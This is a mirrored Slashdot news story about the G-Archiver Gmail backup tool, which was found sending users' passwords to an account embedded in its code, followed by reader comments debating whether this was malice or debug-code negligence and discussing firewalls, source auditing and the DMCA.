Slashdot Mirror

← Back to Stories (view on slashdot.org)

G-Archiver Harvesting Google Mail Passwords

Posted by kdawson on from the change-password-now dept.

Thwomp writes "It appears that a popular Gmail backup utility, G-Archiver, has been harvesting users' Gmail passwords. This was discovered when a developer named Dustin Brooks took a look at the code using a decompiler. He discovered a Gmail account name and password embedded in the source code. Brooks logged in and found over 1,700 emails all with user account information — with his own at the top. According to a story in Informationweek, he deleted the emails, changed the account password, and notified Google. The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in the product."

21 of 462 comments (clear)

  1. This is why I backup my Gmail with G-Archiver by Anonymous Coward · · Score: 5, Funny

    Oh, wait...

    1. Re:This is why I backup my Gmail with G-Archiver by bberens · · Score: 5, Insightful

      Not really JUST as easily. You fully expect the G-Archiver to be transmitting encrypted (ssl) data to google. A few extra packets aren't going to raise any red flags.

      --
      Check out my lame java blog at www.javachopshop.com
    2. Re:This is why I backup my Gmail with G-Archiver by pipatron · · Score: 5, Insightful

      running a strong firewall

      Wouldn't help a bit; the good and the bad parts of the software used the same port to the same server in the same way.

      run a packet sniffer

      Wouldn't help a bit; the good and the bad parts of the software used the same SSL channel, you won't get into that with a normal sniffer.

      --
      c++; /* this makes c bigger but returns the old value */
    3. Re:This is why I backup my Gmail with G-Archiver by infonography · · Score: 5, Funny

      Well he wrote it .Net, isn't that enough evidence of malicious intent?

      --
      Sorry about the writing. Robot fingers, you know? Cliff Steele in DOOM PATROL #23
    4. Re:This is why I backup my Gmail with G-Archiver by TheoMurpse · · Score: 5, Insightful

      What I want to know is, if he used this for debugging purposes and left it in by accident, why didn't he ever see thousands of Gmail passwords showing up in his inbox and realize the problem?

    5. Re:This is why I backup my Gmail with G-Archiver by Rabbi+T.+White · · Score: 5, Insightful

      From looking at the pictures on the blog of the guy who discovered this, there were over 1000 unread emails - all the ones on the initial page of the inbox were usernames and passwords, quite clearly unread. If we're giving him the benefit of the doubt, tt is likely that this was just a throw away account used for testing... or else he probably would've changed his own password, no?

      --
      Every cloud has a silver lining, but, then again, so does every cigarette packet.
  2. Debug, Sure by Archangel+Michael · · Score: 5, Insightful

    "The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in [CC] the product."

    Right. And I have a bridge I'd like to sell you too.

    --
    Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    1. Re:Debug, Sure by tristian_was_here · · Score: 5, Funny

      I did something similar I once picked up the wrong keys yet when I went to take them back to the person I decided to let myself in and accidentally walked out with a new TV.

    2. Re:Debug, Sure by Anonymous Coward · · Score: 5, Funny

      Right. And I have a bridge I'd like to sell you too.

      Why do you feel the need to hurt the reputation and business of us legitimate bridge sellers?!?

  3. That doesn't make sense. by RandoX · · Score: 5, Insightful

    If you're debugging, you already have the account details. What possible reason could you have to email them to yourself?

  4. Hmmm by Anonymous Coward · · Score: 5, Funny

    he deleted the emails But did he make a backup first?
    1. Re:Hmmm by jeepee · · Score: 5, Insightful

      he deleted the emails
      But did he make a backup first?

      He tried but it caused an infinite loop.
      --
      Overuse of the Pumping Lemma causes blindness
  5. DMCA by yohaas · · Score: 5, Insightful

    If this was a big company, they would have denied it and gone after him under the DMCA. At least the admitted to something and pulled to product.

  6. Re:Even the courts aren't this daft by WPIDalamar · · Score: 5, Funny

    It only did send them to Gmail :)

  7. Never ascribe to malice by Pope · · Score: 5, Insightful

    what can be explained by incompetance?

    Although in this case, that's some serious incompetance going on!

    --
    It doesn't mean much now, it's built for the future.
  8. Just wondering... by Doodhwala · · Score: 5, Interesting


    So why did the binary program also have the password for the gmail account? One would assume that the email address would have been enough. After all, sending someone email doesn't require their password.

  9. Re:Even the courts aren't this daft by Zordak · · Score: 5, Funny

    This guy deserves to be prosecuted under anti-hacking statutes. Exactly. I mean, he was using a debugger! Doesn't he know that violates the DMCA? No doubt he'll be hearing from the G-Archiver lawyers AND the DoJ soon. It's time to show this clown that, in America, we don't put up with these kinds of shenanigans. And somebody call the copyright lobby. This is exactly the story they've been looking for to justify increasing the penalties for violating copyright to capital punishment.
    --

    Today's Sesame Street was brought to you by the number e.
  10. Re:Nice move, but illegal? by San-LC · · Score: 5, Insightful

    Possibly by some ridiculous interpretation of the law, Mr. Books was "hacking." However, he purchased the rights to use G-Archiver, and he did not recompile the program in a different way and label it his own. He used information that the program (to which he has the rights to use, unless otherwise stated in some bullsheet EULA) used, found out that this program acted like a Trojan virus and submitted private information to an individual's e-mail account, and subsequently removed his information and disallowed any new information to be read.

    Granted, he probably shouldn't have deleted everything and changed the password (morally: yes, legally: no), so it's likely he may face charges because of this. That's our legal system, folks.

  11. Re:A-ha! by Roofus · · Score: 5, Funny

    Yeah, I was logged into your account and noticed that too....very strange!

  12. Doesn't look malicious to me by Pogie · · Score: 5, Insightful

    Maybe I'm getting old, but this seems like a pretty clear case of "oh crap, I'm an idiot", rather than "mwuahahah, my plan for global domination proceeds apace!". According to the posting on codinghorror, the guy who found the issue (Dustin Brooks) found that the creator, John Terry, of the G-Archiver software had left his own email information in the code. Yes, the G-archiver forwarded a record of the account information of everyone who used the app to that mailbox, but if you look at the screenshot, none of those emails has been flagged as read by gmail (but maybe that's an artifact of a POP connection?).

    Either way, this just smacks to me of a novice developer doing something incredibly dumb, rather than incredibly malicious. If he actually wanted to just collect other people's account information, why leave his own in the source code? He could have just as easily forwarded the information to an anonymized email account, or simply an account for which the login information was not present in source.

    Just my opinion, I reserve the right to be wrong.
  13. Wha?!? by an.echte.trilingue · · Score: 5, Informative

    Rather, you're much better off running a strong firewall that's not the same piece of software or hardware at the boundary of your network which will pick up on nasty things I am quite interested in learning what kind of hard firewall you have that is capable of distinguishing between a packet sent over port 80 originating in, say, Internet Explorer and any other piece of software. I am also interested in knowing what software firewall you have that can block applications from rewriting its rules to allow themselves access.

    It's only 'easy' if your time has no value and you're competent to examine the source, which I would say the vast majority if not 99.9999% of people aren't...you can run a packet sniffer and keep an eye on what the software is sending across the network Um, IMHO, checking the source is way faster and takes way less skill than this easily subverted clusterf*ck that you are proposing. Besides, the very thing that makes a hardware firewall useless for cases like this also makes this approach unreliable.

    which I would say the vast majority if not 99.9999% of people aren't. While we are in the realm of imaginary statistics, I would say that about 100 times as many people are competent to examine the source of a program than to decompile a program and read the resulting nasty, uncommented, tangled pile of commands that results from that. That makes it about 100 times as likely that somebody will find a back door like this in OSS code, doesn't it?

    Oh, by the way, you realize that lots of people are paid to audit OSS code before they deploy it in their company, right? The ability to do this is actually a selling point for a lot of companies.

    (and unless the software has got a built-in ansible, that should be good enough for almost all applications.) What are you talking about?
    --
    weirdest thing I ever saw: scientology advertising on slashdot.